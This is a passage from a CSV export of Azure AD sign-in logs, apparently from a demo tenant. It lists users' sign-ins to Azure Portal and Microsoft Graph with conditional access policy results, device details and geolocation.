'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:16,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",db55024e-3806-4afb-a208-7136d7d22200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,db55024e-3806-4afb-a208-7136d7d22200,SigninLogs,Sucess,47.47483063,-122.1431198
+465,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:46.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,05dad083-15ae-4eb4-ba68-a36a37fc5c03,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",ef25d409-5b39-40ff-aa11-5c8202a74600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ef25d409-5b39-40ff-aa11-5c8202a74600,SigninLogs,Sucess,32.32146072,34.85319901
+466,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",b2355a94-e8b5-42de-b49a-7e28072d0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b2355a94-e8b5-42de-b49a-7e28072d0100,SigninLogs,Sucess,35.01296997,-80.93171692
+467,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:52,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 80.0.3987', 'displayName': 'ELABRAMO-LAP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",660b71b9-9c51-4814-a46b-358384744c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,660b71b9-9c51-4814-a46b-358384744c00,SigninLogs,Sucess,32.77729034,35.22056961
+468,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:17.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",17ea6265-ad23-4765-8c42-0b9f66591a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,17ea6265-ad23-4765-8c42-0b9f66591a00,SigninLogs,Sucess,50.6406517,5.572050095
+469,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:15.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d4b1262-51fd-4063-ad3a-cf5edb0b5e41,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d3b25eb5-284d-4091-85e8-2c1154021d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d3b25eb5-284d-4091-85e8-2c1154021d00,SigninLogs,Sucess,33.7984581,-84.38828278
+470,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6ac7d6a5-203d-410a-b4e2-b96d70f00000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6ac7d6a5-203d-410a-b4e2-b96d70f00000,SigninLogs,Sucess,32.32146072,34.85319901
+471,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 